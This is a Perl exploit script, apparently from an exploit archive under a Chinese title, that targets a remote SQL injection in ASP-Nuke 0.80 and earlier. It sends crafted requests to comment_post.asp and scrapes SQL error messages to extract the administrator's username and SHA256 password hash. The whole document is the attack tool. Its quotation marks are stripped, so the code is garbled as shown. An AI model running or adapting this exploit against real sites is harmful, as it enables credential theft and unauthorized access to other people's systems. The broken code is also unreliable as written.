ASP-Nuke <= 0.80 comment_post.asp远程SQL注入漏洞

                                                #!/usr/bin/perl -w
    #
    # SQL Injection Exploit for ASPNuke <= 0.80
    # This exploit show the username of the administrator of the board and his password crypted in SHA256
    # Related advisory: http://www.securityfocus.com/archive/1/403479/30/0/threaded
    # Discovered and Coded by Alberto Trivero

 

 use LWP::Simple;

 print  \n\t===============================\n ;
    print  \t= Exploit for ASPNuke <= 0.80 =\n ;
    print  \t=     by Alberto Trivero      =\n ;
    print  \t===============================\n\n ;

 if(@ARGV!=1 or !($ARGV[0]=~m/http/)) {
       print  Usage:\nperl $0 [full_target_path]\n\nExamples:\nperl $0 http://www.example.com/aspnuke/\n ;
       exit(0);
    }

 $page=get($ARGV[0]. module/support/task/comment_post.asp?TaskID=Username ) || die  [-] Unable to retrieve: $! ;
    print  [+] Connected to: $ARGV[0]\n ;
    $page=~m/the varchar value 
   (.*?)
    to a column/ && print  [+] Username of admin is: $1\n ;
    print  [-] Unable to retrieve Username\n  if(!$1);
    $page=get($ARGV[0]. module/support/task/comment_post.asp?TaskID=Password ) || die  [-] Unable to retrieve: $! ;
    $page=~m/the varchar value 
   (.*?)
    to a column/ && print  [+] SHA256 hash of password is: $1\n ;
    print  [-] Unable to retrieve hash of password\n  if(!$1);